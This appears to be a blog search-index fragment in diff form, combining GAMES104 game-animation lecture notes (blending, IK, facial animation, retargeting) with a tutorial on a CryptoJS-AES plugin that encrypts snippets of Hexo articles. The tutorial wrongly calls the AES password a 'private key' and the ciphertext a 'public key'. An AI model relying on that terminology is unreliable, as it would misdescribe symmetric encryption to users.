    ​我们会让机器人以不同的姿势鼓掌(用蒙版结合两个动画 clips)

    Additive Blending

    webp

    Add a difference clip into a regular clip to produce a new clip

    ​将差异剪辑添加到常规剪辑中以生成新剪辑

    Additive Blending introduces a new kind of animation called a difference clip, which represents the difference between two regular animation clips.

    ​加法混合(Additive Blending)引入了一种称为差异剪辑(difference clip)的新型动画,它表示两个常规动画剪辑之间的差异。

    A difference clip can be added into a regular animation clip in order to produce interesting variations in the pose and movement of the character.

    ​可以将差异剪辑添加到常规动画剪辑中,以便在角色的姿势和运动中产生有趣的变化。

    Nodding to Camera

    webp

    ​朝向摄像机点头的动画。

    Additive Blending - Abnormal Bone Results

    ​加法混合 - 骨骼结果异常

    webp

    Additive blends are more likely to have abnormal bone results

    ​加法混合更有可能产生异常的骨骼结果

    Animation Blending Summary

    ​动画混合总结

    webp

    • 1D Blend Space

      一维混合空间

      • Blend poses based on a single input value

        基于单个输入值混合姿势

    • 2D Blend space

      • Blend poses based on two input values

        基于两个输入值混合姿势

      • Triangular blend

        三角形混合

    • Masked Blending

      蒙版混合

    • Additive Blending

      加法混合

    Action State Machine (ASM)

    ​动作状态机(一种有限状态机)

    Case: Jumping

    webp

    How to animate jump?

    ​如何制作跳跃动画?

    Blend Space is synchronous, but jump is stateful

    ​混合空间是同步的,但跳跃是有状态的

    We usually model the jumping action via a finite state machine, commonly known as the Action State Machine (ASM)

    ​我们通常通过有限状态机(通常称为动作状态机(ASM))来模拟跳跃动作

    ASM Definition

    ​ASM 定义

    webp

    • ASM consists of nodes and transitions

      ASM 由节点和转换组成

    • Node types

      节点类型

      • Blend space

        混合空间

      • Clip

        片段

    class ActionStateMachineClipNode
    {
        AnimationClip m_clip;
        bool          m_is_loop;
    };

    class ActionStateMachineBlendSpaceNode
    {
        BlendSpace m_blend_space;
        bool       m_is_loop;
    };
    • Transition types

      过渡类型

      • simply "pop" from one state to another

        只需从一种状态“弹出”到另一种状态

      • cross-fade from one state to the next

        从一种状态交叉淡入淡出到另一种状态

      • Special transitional states

        特殊过渡状态

    Cross Fades

    ​交叉淡入淡出

    webp

    Two common ways

    ​两种常见方式

    • Smooth transition

      平稳过渡

      • restriction: the two clips must be looping animations, and their timelines must be synchronized

        限制:两个剪辑必须是循环动画,并且它们的时间线必须同步

    • Frozen transition

      冻结过渡

    Cross Fades Curve

    webp

    Different cross fades curve could be used for different demands

    ​不同的交叉淡入淡出曲线可用于不同的需求

    Animation State Machine in Unreal

    ​虚幻中的动画状态机

    webp

    • State: a blueprint graph which outputs a pose

      状态:输出姿势的蓝图

    • Transition : control when to change state and how to blend (Multi)

      过渡:控制何时改变状态以及如何混合(多)

    Layered ASM

    ​分层状态机

    webp

    Layered ASM allows different parts of a character's body to do different, independent or semi-independent actions simultaneously

    ​角色身体的不同部位同时做不同的、独立或半独立的动作

    Animation Blend Tree

    ​现代游戏引擎常用的方法——动画混合树

    Blend Tree

    ​混合树

    webp

    Structure layered ASMs and operations as a tree

    ​将分层 ASM 和操作构建为树

    • Inspired by expression tree

      受到表达式树的启发

    • Easy to understand for animators

      动画师易于理解

    For a blend tree

    ​对于混合树

    • Non-terminal nodes and terminal nodes (leaf nodes)

      非终端节点和终端节点(叶节点)

    • The result of each non-terminal node is a pose

      每个非终端节点的结果是一个位姿

    LERP Blend Node

    ​LERP 混合节点

    webp

    • Binary LERP node

      二元 LERP 节点

      • Basic non-terminal node in blend tree

        混合树中的基本非终端节点

      • LERP two input poses with weight $\beta$ into one output pose

        以权重 $\beta$ 对两个输入姿势做 LERP,得到一个输出姿势

    Usually extended to handle multiple inputs (e.g. Ternary/Quad LERP node)

    ​通常扩展为处理多个输入(例如三元/四元 LERP 节点)

    Additive Blend Node

    ​加法混合节点

    webp

    • Basic non-terminal node in blend tree

      混合树中的基本非终止节点

    • Add the second input pose (usually a difference one) into the first input pose by weight $\beta$

      按权重 $\beta$ 将第二个输入姿势(通常是差异姿势)添加到第一个输入姿势中

    Express Layered ASM in Blend Tree

    ​在混合树中表达分层 ASM

    webp

    Use a blend tree to describe the desired final pose of ASMs

    ​使用混合树来描述 ASM 所需的最终姿态

    Blend Tree Nodes

    ​混合树节点

    webp

    Terminal node (Leaf Nodes)

    ​终端节点(叶节点)

    • Clip
    • Blend Space
    • ASM

    Non-terminal node (Non-Leaf Nodes)

    ​非终端节点(非叶节点)

    • Binary LERP blend node

      二元 LERP 混合节点

    • Ternary (triangular) LERP blend node

      三元(三角形)LERP 混合节点

    • Binary additive blend node

      二元加法混合节点

    Unreal Animation Blueprint

    ​虚幻动画蓝图

    webp

    A blueprint graph which outputs a final pose

    ​输出最终姿势的蓝图

    • Take clip poses or the results of ASMs as input

      将剪辑姿势或 ASM 结果作为输入

    • Blend input poses by different methods

      通过不同的方法混合输入姿势

    Blend Tree Control Parameters

    ​混合树控制参数

    • node search

      节点搜索

      provide a way for higher-level code to find blend nodes in the tree

      为高层代码提供一种在树中查找混合节点的方法

    • named variable

      命名变量

      allow names to be assigned to the individual control parameters. The controlling code can look up a control parameter by name in order to adjust its value

      允许为各个控制参数分配名称。控制代码可以通过名称查找控制参数以调整其值

    • control structure

      控制结构

      a simple data structure, contains all of the control parameters for the entire character. The nodes in the blend tree(s) are connected to particular control parameters

      一个简单的数据结构,包含整个角色的所有控制参数。混合树中的节点连接到特定的控制参数

    An animation blend tree is way more complicated than these classic nodes (i.e. event nodes, calculation/logic nodes and special blending and flow control nodes)

    ​动画混合树比这些经典节点(即事件节点、计算/逻辑节点以及特殊混合和流程控制节点)要复杂得多。

    Unreal Animation Blueprint Control

    ​虚幻动画蓝图控制

    webp

    Named variables as members in animation blueprint

    ​命名变量作为动画蓝图中的成员

    • Can be updated through blueprint

      可以通过蓝图进行更新

    • Can be used anywhere inside the Blend Tree

      可以在混合树内的任何地方使用

    Unreal 5 Animation Tree Sample

    webp

    Inverse Kinematics (IK)

    ​逆运动学 (IK)

    Basic Concepts

    webp

    • End-effector

      末端执行器

      The bone which is expected to be moved to a desired position

      预计将移动到所需位置的骨骼

    • IK (Inverse Kinematics)

      IK(逆运动学)

      The use of kinematic equations to determine the joint parameters of a manipulator so that the end-effector moves to a desired position

      利用运动学方程确定机械手的关节参数,使末端执行器移动到所需位置

    • FK (Forward Kinematics)

      FK(正向运动学)

      The use of the kinematics equations of a robot to compute the position of the end-effectors from specified values for the joint parameters

      使用机器人的运动学方程根据关节参数的指定值计算末端执行器的位置

    How to Touch the Ground?

    webp

    ​让角色踏入凹凸不平的地面时,脚能正确踏在地面上。

    Intuitive Idea: Adjust Feet Position for Each Step

    ​直观想法:每一步调整脚的位置

    Two Bones IK

    webp

    ​在脚和地面之间建立 IK 约束。

    • 3D space

    webp

    • Determine the final pose by a reference vector

      通过参考向量确定最终姿态

    webp

    More Complicated IK Scenarios

    ​更复杂的 IK 场景

    webp

    Complexity of Multi-Joint IK Solving

    ​多关节 IK 求解的复杂性

    webp

    • Computation cost: high dimension non-linear function solving in real-time

      计算成本:实时求解高维非线性函数

    • May have multiple solutions, a unique solution, or no solution

      可能有多种解决方案、唯一解决方案或无解决方案

    Check Reachability of the Target

    ​检查目标的可达性

    webp

    Constraints of Joints

    webp

    ​人体的关节有多种,不同的关节能做出不同范围的变换。

    ​哦!游戏引擎开发者还要对解剖学有所涉猎。

    Need Treat Constraints Seriously

    ​需要认真对待约束

    webp

    ​约束不充分,游戏中出现反关节运动。

    Heuristics Algorithm

    ​启发式算法

    Why

    • Too many joints + constraints, difficult to solve with analytical methods

      关节 + 约束过多,难以用分析方法解决

    Basic Idea

    ​基本思想

    Designed to solve problem in faster and more efficient fashion by sacrificing optimality, accuracy, precision, or completeness for speed

    ​旨在通过牺牲最优性、准确性、精密度或完整性来换取速度,以更快、更高效的方式解决问题

    • Approximation

      近似值

    • Global optimality is not guaranteed

      不保证全局最优

    • Iteration is usually used with a maximum limit

      迭代通常使用最大限制

    CCD (Cyclic Coordinate Descent)

    ​CCD(循环坐标下降)

    Principle

    • From joint to joint, rotates the end-effector as close as possible to the target; solves the IK problem in orientation space

      从一个关节到下一个关节,旋转使末端执行器尽可能靠近目标,在方向空间中求解 IK 问题

    Reachability

    ​可达性

    • Algorithm can stop after certain number of iterations to avoid unreachable target problem

      算法可以在一定次数的迭代后停止,以避免无法达到目标的问题

    Constraints

    ​限制条件

    • Angular limits are allowed, by checking after each iteration

      通过在每次迭代后检查,允许角度限制

    Optimized CCD (1/2)

    ​优化 CCD (1/2)

    webp

    Add tolerance regions to each bone’s goal

    ​为每个骨骼的目标添加容差区域

    • Each bone stops rotating and moves onto the next bone within tolerance region

      每个骨骼停止旋转并移动到公差范围内的下一个骨骼

    • Helps to produce poses that are less rigid and more comfortable looking

      有助于塑造不那么僵硬且看起来更舒适的姿势

    Optimized CCD (2/2)

    webp

    Use under-damped angle scaling

    ​使用欠阻尼角度缩放

    • Each joint moves only a small amount toward the goal and distributes the movement across multiple bones

      每个关节仅向目标移动少量,并将移动分布到多个骨骼上

    • Produce less abrupt joint changes and more smooth and casual poses for character movement

      减少突然的关节变化,并为角色运动提供更平滑和随意的姿势

    FABRIK (Forward And Backward Reaching Inverse Kinematics)

    ​FABRIK(向前和向后到达逆运动学)

    webp

    Principle

    ​原则

    • Instead of orientation space, solves the IK problem in position space

      不在方向空间,而是在位置空间中求解 IK 问题

    Reachability

    ​可达性

    • Algorithm can stop after a certain number of iterations to avoid the unreachable target problem (a code sketch follows below)

      算法可以在一定次数的迭代后停止,以避免无法达到目标的问题
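
    ​A minimal, self-contained sketch of the two passes (backward from the target, forward from the root); the math types are written out here and this is not production code:

    #include <cmath>
    #include <vector>

    struct Vec3 {
        float x, y, z;
        Vec3 operator+(const Vec3& o) const { return { x + o.x, y + o.y, z + o.z }; }
        Vec3 operator-(const Vec3& o) const { return { x - o.x, y - o.y, z - o.z }; }
        Vec3 operator*(float s) const { return { x * s, y * s, z * s }; }
    };

    static float Dist(const Vec3& a, const Vec3& b) {
        Vec3 d = a - b;
        return std::sqrt(d.x * d.x + d.y * d.y + d.z * d.z);
    }

    // joints[0] is the fixed root; bone lengths are preserved in each pass.
    void Fabrik(std::vector<Vec3>& joints, const Vec3& target,
                int maxIterations = 10, float tolerance = 1e-3f) {
        const size_t n = joints.size();
        std::vector<float> len(n - 1);
        for (size_t i = 0; i + 1 < n; ++i) len[i] = Dist(joints[i], joints[i + 1]);

        const Vec3 root = joints[0];
        for (int it = 0; it < maxIterations; ++it) {   // stop after a fixed iteration budget
            if (Dist(joints[n - 1], target) < tolerance) break;
            // Backward pass: pin the end-effector to the target, walk toward the root.
            joints[n - 1] = target;
            for (size_t i = n - 1; i-- > 0; )
                joints[i] = joints[i + 1] +
                            (joints[i] - joints[i + 1]) * (len[i] / Dist(joints[i], joints[i + 1]));
            // Forward pass: pin the root back in place, walk toward the end-effector.
            joints[0] = root;
            for (size_t i = 0; i + 1 < n; ++i)
                joints[i + 1] = joints[i] +
                                (joints[i + 1] - joints[i]) * (len[i] / Dist(joints[i], joints[i + 1]));
        }
    }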

    FABRIK with Constraints

    ​有约束的 FABRIK

    webp

    Re-positioning

    ​重新定位

    • Joint restrictions can be enforced at each step by taking the resultant orientation and forcing it to stay within the valid range

      可以通过采用最终的方向并迫使其保持在有效范围内,在每一步中强制执行联合限制

    Multiple End-Effectors

    ​多个末端执行器

    webp

    • May result in conflict between goals, which can not be achieved simultaneously

      可能导致目标之间发生冲突,无法同时实现

    • May use a priority or a weighted approach

      可以使用优先级或加权方法

    IK with Multiple End-Effectors

    ​具有多个末端执行器的 IK

    webp

    If a shared bone needs to be moved, the end-effector that is updated last will get priority and the other bones will be pulled away

    ​如果需要移动共享骨骼,则最后更新的末端执行器将优先,其他骨骼将被拉走

    Jacobian Matrix

    ​雅可比矩阵

    webp

    In vector calculus, the Jacobian matrix of a vector-valued function of several variables is the matrix of all its first-order partial derivatives

    ​在向量微积分中,多个变量向量值函数的雅可比矩阵是其所有一阶偏导数的矩阵。

    ​课上说这个雅可比矩阵要放到物理那块去讲。

    Using Jacobian Matrix to Present Joint Rotations

    ​使用雅可比矩阵表示关节旋转

    webp

    Jacobian Matrix with Multiple End-effectors

    ​具有多个末端执行器的雅可比矩阵

    $$J=\begin{bmatrix}\frac{\partial\overrightarrow{s_1}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_1}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_1}}{\partial\theta_n}\\\frac{\partial\overrightarrow{s_2}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_2}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_2}}{\partial\theta_n}\\\vdots&\vdots&\ddots&\vdots\\\frac{\partial\overrightarrow{s_m}}{\partial\theta_1}&\frac{\partial\overrightarrow{s_m}}{\partial\theta_2}&\cdots&\frac{\partial\overrightarrow{s_m}}{\partial\theta_n}\end{bmatrix}$$

    $m$: the number of end-effectors

    ​$m$:末端执行器的数量

    $n$: the number of joints

    ​$n$:关节数量

    Approaching to Target Step by Step

    ​一步步接近目标

    webp

    Other IK Solutions

    ​其他 IK 解决方案

    Physics-based Method

    ​基于物理的方法

    • More natural

      更自然

    • Usually need lots of computation if no optimization

      如果没有优化,通常需要大量计算

    PBD (Position Based Dynamics)

    ​PBD(基于位置的动力学)

    • Different from traditional physics-based method

      与传统的基于物理的方法不同

    • Better visual performance

      更好的视觉表现

    • Lower computational cost

      较低的计算成本

    Fullbody IK in UE5

    ​UE5 中的全身 IK

    • XPBD (Extended PBD)

      XPBD(扩展 PBD)

    IK is Still a Challenge

    ​IK 仍然是一个挑战

    webp

    • Self-collision avoidance

      自碰撞规避

    • IK with prediction during movement

      移动过程中带有预测的 IK

    • Natural human behavior

      人类的自然行为

      • Data-driven and deep learning

        数据驱动和深度学习

    ​如果做不好容易出现奇葩动画。

    IK Hot Research Areas

    webp

    From Inverse Kinematics Techniques in Computer Graphics: A Survey

    这篇综述认为 IK 是目前的研究热点。

    Updated Animation Pipeline with Blending and IK

    ​加入混合和 IK 后更新的动画管线

    webp

    Facial Animation

    ​表情动画

    Face is Driven by Complex Muscle System

    ​现实世界中,面部由复杂的肌肉系统驱动

    webp

    • 43 Muscles

      43 块肌肉

    • Varying shape, strength and movement

      不同的形状、力量和动作

    • Work together to make expressions

      共同协作以产生表情

    High Precision Requirements

    ​高精度要求

    Minor change makes difference:

    ​微小的改变就会带来不同:

    • Voluntary / Forced

      自愿 / 强迫

    • Natural / intentional

      自然 / 故意

    • Sometimes shows quite opposite expressions

      有时表现出完全相反的表情

    Facial Action Coding System

    ​面部动作编码系统

    Facial Action Coding System (FACS) is a system to taxonomize human facial movements by their appearance on the face.

    ​面部动作编码系统(FACS)是一种根据人类面部动作在面部的外观进行分类的系统。

    webp

    Some of the 46 basic movements are named Action Units (AU)

    ​46 个基本动作中的一部分被称为动作单元(AU)

    Action Units combination

    ​动作单元组合

    webp

    An expression can be considered as a combination of some of the basic movements

    ​一个表情可以被认为是一些基本动作的组合

    28 Core Action Units

    ​28 个核心动作单元

    webp

    • Apple Inc. extracted the 28 core AUs

      Apple Inc. 提取了 28 个核心 AU

    • 23 Symmetric AUs are divided into two basic actions

      23 个对称 AU 分为两个基本动作

    • The basic action set varies according to the animation production requirements

      基本动作设置根据动画制作要求而变化

    Key Pose Blending

    ​关键姿势混合

    webp

    A set of key poses (a variation on per-vertex animation)

    ​一组关键姿势(逐顶点动画的变体)

    Problems of Simple Blending

    webp

    ​简单的表情动画混合可能不太好使。比如我想用一个张嘴和闭眼的动作合成一个既张嘴又闭眼的动作。

    FACS In Morph Target Animation

    ​变形目标动画中的 FACS

    webp

    Vertex offset from neutral face

    ​顶点与中性面的偏移

    • Create AU key poses that only store the vertices differing from the neutral pose (additive blending; a code sketch follows below)

      创建的 AU 关键姿势仅存储与中性姿势不同的顶点(加法混合)
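
    ​A minimal, self-contained sketch of evaluating such sparse morph targets (types are illustrative, not engine API):

    #include <cstddef>
    #include <vector>

    struct Vertex { float x, y, z; };

    struct MorphTarget {                  // one AU key pose
        std::vector<std::size_t> indices; // only the vertices that differ from neutral
        std::vector<Vertex> offsets;      // their offsets from the neutral pose
    };

    void EvaluateFace(const std::vector<Vertex>& neutral,
                      const std::vector<MorphTarget>& targets,
                      const std::vector<float>& weights,   // one weight per AU
                      std::vector<Vertex>& out) {
        out = neutral;                    // start from the neutral face
        for (std::size_t t = 0; t < targets.size(); ++t) {
            for (std::size_t k = 0; k < targets[t].indices.size(); ++k) {
                Vertex& v = out[targets[t].indices[k]];
                const Vertex& o = targets[t].offsets[k];
                v.x += weights[t] * o.x;  // additive: neutral + sum of weighted offsets
                v.y += weights[t] * o.y;
                v.z += weights[t] * o.z;
            }
        }
    }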

    Morph Target Animation

    ​变形目标动画

    webp

    webp

    ​一般表情动画都是顶点动画,不过也可以用骨骼动画强行做。

    UV Texture Facial Animation

    ​UV 纹理面部动画

    webp

    Using a series of texture maps applied to a simple head shape

    ​使用一系列应用于简单头部形状的纹理贴图。Live2D 就是这么做的。

    Muscle Model Animation

    webp

    Relies on a physical basis: more precise, but more sophisticated

    ​依赖物理基础,更精确,但也更复杂。还在研究阶段,没有被广泛应用。

    • Muscle controls most part of the face

      肌肉控制着脸部的大部分

    • 3 Layers: Skin Layer, Muscle Layer, Bone Layer

      3 层:皮肤层、肌肉层、骨骼层

    • The point of insertion will move an amount determined by the muscle

      插入点将移动由肌肉决定的量

    The model used for the skin will dictate how the area around the insertion point muscle reacts

    ​用于皮肤的模型将决定插入点肌肉周围的区域如何反应

    MetaHuman

    ​MetaHuman(虚幻引擎的数字人技术)

    Animation Retargeting

    ​动画重定向

    Share Animation Among Characters

    ​在角色之间共享动画

    webp

    • Allow animations to be reused between characters (save animator’s work)

      允许在角色之间重复使用动画(节省动画师的工作)

    • Adapt motion captured animations to different characters (reduce the cost)

      使动作捕捉动画适应不同的角色(降低成本)

    Terminology

    ​术语

    webp

    ​已知 Source Character、Target Character 和 Source Animation,求 Target Animation。

    Ignore Offset Between Source and Target Joints

    ​忽略源关节和目标关节之间的偏移

    webp

    Keep Orientation in Different Binding Pose

    ​保持不同绑定姿势的方向

    webp

    Process Tracks

    ​分别处理各个动画轨道

    webp

    Handle animation tracks respectively (a code sketch follows this list)

    ​分别处理动画轨迹

    • Rotation track comes from source animation

      旋转轨迹来自源动画

      • Keep joint orientation in animation

        保持动画中的关节方向

    • Translation track comes from target skeleton

      平移轨迹来自目标骨架

      • Keep the proportion of target skeleton

        保持目标骨骼的比例

    • Scale track comes from source animation

      缩放轨迹来自源动画

      • Keep the scale in animation

        保持动画比例
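
    ​The per-track rule above can be summarized in a minimal sketch (the types are illustrative, not engine API):

    struct Quaternion { float x, y, z, w; };
    struct Vector3    { float x, y, z; };
    struct JointPose  { Quaternion rotation; Vector3 translation; Vector3 scale; };

    JointPose RetargetJointPose(const JointPose& sourceAnimPose,   // animated source pose
                                const JointPose& targetBindPose) { // target binding pose
        JointPose result;
        result.rotation    = sourceAnimPose.rotation;    // keep the animated orientation
        result.translation = targetBindPose.translation; // keep the target's proportions
        result.scale       = sourceAnimPose.scale;       // keep the animated scale
        return result;
    }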

    Align Movement by Pelvis Height

    ​根据骨盆高度对齐运动

    webp

    The movement of the character

    ​角色的动作

    • Usually controlled by a displacement curve or the motor system at runtime

      通常在运行时由位移曲线或运动系统(motor system)控制

      • Displacement Curve is extracted from the pelvis pose in animation

        位移曲线是从动画中的骨盆姿势中提取的

    • Needs to be scaled by the proportion of the pelvis

      需要根据骨盆的比例进行缩放

    Lock Feet by IK after Retargeting

    ​重定向后用 IK 锁定双脚

    webp

    Source Skeleton (left) vs. Target Skeleton with longer thigh (middle) or longer calf (right)

    ​源骨骼(左)与大腿较长(中)或小腿较长(右)的目标骨骼

    webp

    If the thigh is horizontal (left), longer thigh results in hanging feet (middle) while longer calf results in penetration (right)

    ​如果大腿是水平的(左),较长的大腿会导致悬足(中),而较长的小腿则会导致穿透(右)

    Retargeting with Different Skeleton Hierarchy

    ​使用不同的骨架层次结构进行重定向

    webp

    Source Skeleton with 1 spine (left) vs. Target Skeleton with 3 spines (center)

    ​具有 1 个脊柱的源骨骼(左)与具有 3 个脊柱的目标骨骼(中)

    ​不同人物的骨骼数量可能不同。

    Easy Solution

    webp

    ​绑定骨骼时做好严格的规范,这样就能做到不同数量骨骼间的映射。

    Retargeting Animation in Omniverse

    ​Omniverse 中的重定向动画

    Unresolved Problems of Retargeting

    ​未解决的重定向问题

    webp

    • Self mesh penetration

      自网格穿透

    • Self contact constraints (e.g. the hands when clapping)

      自我接触限制(例如拍手时的手)

    • The balance of the target character

      目标角色的平衡性

    Morph Animation Retargeting

    ​变形动画重定向

    webp

    Different faces sharing the same topology

    ​不同的面共享相同的拓扑

    Morph Animation Retargeting Problem

    webp

    webp

    ​动画重定向后眼睛闭不上之类的问题。

    Take Away

    • Controlled animation blending system is the key to animate character according to game play

      受控动画混合系统是根据游戏玩法制作角色动画的关键

    • Inverse Kinematics helps a character's animation adapt to environment constraints

      逆运动学帮助角色的动画适应环境限制

    • Facial expression can be encoded in Action Units in FACS

      面部表情可以编码在 FACS 的动作单元中

    • Morph target animation is well applied in facial animation

      变形目标动画在面部动画中得到很好的应用

    • Retargeting can help reuse skeletal animations and facial animations among characters

      重新定位可以帮助在角色之间重用骨骼动画和面部动画

    ]]>
    @@ -1888,7 +1888,7 @@ /posts/Hexo-%E5%9F%BA%E4%BA%8E%20CryptoJS-AES%20%E7%9A%84%20Hexo%20%E6%96%87%E7%AB%A0%E7%89%87%E6%AE%B5%E5%8A%A0%E5%AF%86%E6%8F%92%E4%BB%B6/ - 看一看

    耍一耍

    CryptoJS-AES 加密/解密工具

    私钥:

    公钥:

    内容:

    写一写

    hexo-blog-encrypt 这个插件只可以加密整个文章,却不能只加密文章中的某个片段,不够灵活。借助 CryptoJS-AES 开发一个简易的文章片段加密插件!这样就可以在我的日记中方便地隐藏我不想公开的部分(比如说 pro 哥坏话)!

    前端

    ​ 研究一下 crypto-js 中 AES 的使用。我想让我的文章在前端中只暴露公钥,不暴露密码和内容。目前 AES 还不能被破解(小小怪如此说道),因此在只有公钥的情况下,不输入正确的密码是无法看到内容的:


    ​在网页中引入 crypto-js

    <script src="crypto-js.min.js" defer></script>

    ​借助 crypto-js,可以写一个使用 AES 加密的逻辑:

    CryptoJS.AES.encrypt(内容, 私钥).toString()

    ​CryptoJS 默认使用 AES-128 加密算法。如果需要使用 AES-256 加密算法,可以在调用 encrypt 方法时传入自定义的秘钥和参数。(但我觉得 AES-128 算法就够用了)

    这个函数输入:

    • 内容:<p>Hello world!<p>
    • 私钥:123

    将会输出:

    • 公钥:U2FsdGVkX1/sbg7iJYyl2slEm9bWPVigmMvoutWnbR+031yQYZcWS2tBoaJMRtbY

    每次输出的公钥还不唯一……

    ​使用 AES 解密:

    CryptoJS.AES.decrypt(公钥, 私钥).toString(CryptoJS.enc.Utf8));

    ​如果公钥和私钥正确,将会正确返回内容,如果错误则返回空。

    ​有时候解密时会出现 Error: Malformed UTF-8 data 错误导致解密失败,参考一下 javascript - Why I get Malformed UTF-8 data error on crypto-js? - Stack Overflow……我也不知道具体啥情况,多检查几遍代码看看哪里有错吧……


    ​好的,现在我们正确掌握了内容、公钥和私钥之间的转换逻辑。如果内容的字符串是一段 HTML 代码,则我们可以将其渲染出来

    ​基于此,我们可以使用 JQuery 定义一个 AESContainer 类以实现我们的文章加密插件:

    class AESContainer {
    constructor(label, pubkey) {
    this.pubkey = pubkey;
    this.container = $('<div>').addClass('AES-container');
    this.inputContainer = $('<div>').addClass('AES-input');
    this.inputField = $('<input>').attr({type: 'password', required: true});
    this.highlight = $('<span>').addClass('hl');
    this.bar = $('<span>').addClass('bar');
    this.label = $('<label>').text(label);

    this.inputContainer.append(this.inputField, this.highlight, this.bar, this.label);
    this.container.append(this.inputContainer);

    this.inputField.on('keypress', this.handleKeyPress.bind(this));
    }

    handleKeyPress(event) {
    if (event.key === 'Enter') {
    this.decrypted = CryptoJS.AES.decrypt(this.pubkey, this.inputField.val()).toString(CryptoJS.enc.Utf8);
    if (this.decrypted) {
    this.inputContainer.remove();
    this.container.append($(this.decrypted));
    }
    }
    }

    render() {
    $(document.currentScript).before(this.container);
    }
    }

    ​再设计偷一个好看的 CSS:

    .AES-container {
    border: 2px solid var(--border);
    margin: 10px auto;
    padding: 10px 20px;
    width: 100%;
    box-sizing: border-box;
    transition: border 0.5s ease-in-out;
    }

    /* form starting stylings ------------------------------- */
    .AES-container .AES-input {
    position: relative;
    margin: 20px 0 10px;
    box-sizing: border-box;
    }

    .AES-input input {
    font-size: 16px;
    padding: 5px 2px;
    display: block;
    width: calc(100% - 4px);
    border: none;
    border-bottom: 2px solid var(--border);
    background: none;
    color: var(--text-primary);
    transition: color 0.5s ease-in-out, border 0.5s ease-in-out;
    }

    .AES-input input:focus {
    outline: none;
    }

    /* LABEL ======================================= */
    .AES-input label {
    color: var(--text-secondary);
    font-size: 16px;
    font-weight: normal;
    position: absolute;
    pointer-events: none;
    top: -5px;
    transition: 0.2s ease all;
    -moz-transition: 0.2s ease all;
    -webkit-transition: 0.2s ease all;
    }

    /* active state */
    .AES-input input:focus~label,
    .AES-input input:valid~label {
    top: -20px;
    font-size: 14px;
    color: var(--text-link);
    }

    /* BOTTOM BARS ================================= */
    .AES-input .bar {
    position: relative;
    display: block;
    width: 100%;
    }

    .AES-input .bar:before,
    .AES-input .bar:after {
    content: '';
    height: 2px;
    width: 0;
    transform: translateY(-2px);
    position: absolute;
    background: var(--text-link);
    transition: 0.2s ease all;
    -moz-transition: 0.2s ease all;
    -webkit-transition: 0.2s ease all;
    }

    .AES-input .bar:before {
    left: 50%;
    }

    .AES-input .bar:after {
    right: 50%;
    }

    /* active state */
    .AES-input input:focus~.bar:before,
    .AES-input input:focus~.bar:after {
    width: 50%;
    }

    /* hlER ================================== */
    .AES-input .hl {
    position: absolute;
    height: 60%;
    width: 100px;
    top: 25%;
    left: 0;
    pointer-events: none;
    opacity: 0.5;
    }

    /* active state */
    .AES-input input:focus~.hl {
    -webkit-animation: inputhler 0.3s ease;
    -moz-animation: inputhler 0.3s ease;
    animation: inputhler 0.3s ease;
    }

    /* ANIMATIONS ================ */
    @-webkit-keyframes inputhler {
    from {
    background: var(--text-link);
    }

    to {
    width: 0;
    background: transparent;
    }
    }

    @-moz-keyframes inputhler {
    from {
    background: var(--text-link);
    }

    to {
    width: 0;
    background: transparent;
    }
    }

    @keyframes inputhler {
    from {
    background: var(--text-link);
    }

    to {
    width: 0;
    background: transparent;
    }
    }

    ​如此做,使用如下语句:

    <script>
    new AESContainer('标签提示词', '公钥').render();
    </script>

    ​即可在 <script> 前创建并渲染一个输入密码的提示框:

    <div class="AES-container">
    <div class="AES-input">
    <input type="password" required="required">
    <span class="hl"></span>
    <span class="bar"></span>
    <label>标签提示词</label>
    </div>
    </div>

    ​真是太棒了!现在我们需要后端帮我们自动生成公钥。

    后端

    ​借助 标签插件(Tag)| Hexo,在 Markdown 中如此写作:

    {% AES '123','密码是"123"~' %}
    Hello world!
    {% endAES %}

    ​经过 Hexo 渲染后转义为:

    <script>new AESContainer('密码是"123"~', 'U2FsdGVkX1+LNox3Pwx7PH6x6yoSjddDb1gcOrYcFddHTHX/6AEXT0VTZUI1nhN5').render();</script>

    ​便大功告成!


    ​在 Hexo 项目根目录下输入如下命令以安装 crypto-js

    npm install crypto-js

    ​在 Hexo 项目下的 scripts 文件夹下新建文件 AES.js,里面写转义标签的逻辑:

    'use strict'

    var CryptoJS = require("crypto-js");

    const parseArgs = args => {
    return args.join(' ').split(',')
    }

    const AESFn = (args, content) => {
    const [password = "", label = '这里的内容需要输入密码才能查看~'] = parseArgs(args)
    content = hexo.render.renderSync({ text: content, engine: 'markdown' });
    if (password == "") {
    return content;
    } else {
    const pubkey = CryptoJS.AES.encrypt(content, password).toString();
    const result = `<script>new AESContainer('${label}', '${pubkey}').render();</script>`;
    return result;
    }
    }

    hexo.extend.tag.register('AES', AESFn, { ends: true })
    • const [password = "", label = '这里的内容需要输入密码才能查看~'] = parseArgs(args) 获取参数,对于标签:

      {% AES '123','密码是"123"~' %}
      • password 为设定的密码 123
      • label 为标签提示词 密码是"123"~,如果为空,则默认值:这里的内容需要输入密码才能查看~,注意逗号后不要有空格。
    • hexo.extend.tag.register('AES', AESFn, { ends: true }) 对于所有 {% AES %}{% endAES %} 标签,调用 AESFn() 函数处理。

    • hexo.render.renderSync({ text: content, engine: 'markdown' }); 借助 Hexo 渲染引擎,将 Markdown 语句转义为 HTML 语句。

    • CryptoJS.AES.encrypt(content, password).toString(); 该函数输入私钥和内容,输出成公钥。

    • <script>new AESContainer('${label}', '${pubkey}').render();</script> 渲染最后转义出的内容并置于当前 <script> 前。

    ​重新编译,大功告成。

    试一试

    念桥边红药

    ​在下面的框框中输入密码 promefire 即可产生 promefire 最喜欢的诗句!

    {% AES 'promefire','密码是"promefire"~' %}
    <marquee behavior="scroll" direction="right" scrollamount="15"><font color="red" size="4px">念桥边红药,年年知为谁生?</font></marquee>
    {% endAES %}

    大故宫

    ​在下面的框框中输入密码 12345678 即可欣赏大故宫!

    {% AES '12345678','密码是"12345678"~' %}
    ![人去楼不空 往昔的叱咤化作春色满园](/2024/05/20/Diary-老儿北儿京儿/1435.webp)
    <center>人去楼不空 往昔的叱咤化作春色满园</center>
    {% endAES %}

    ​请注意:解密后的显示的内容可能需要重新调用一下网页初始化的相关函数才能达到未加密的显示效果!

    ]]>
    @@ -1921,7 +1921,7 @@ /posts/GAMES104-Rendering/ - 资源

    课程

    第四节:游戏引擎中的渲染实践

    Rendering on Game Engine

    Rendering System in Games

    webp

    ​游戏渲染发展历程。

    Q: Is there any game without rendering?

    ​有。比如文字游戏。

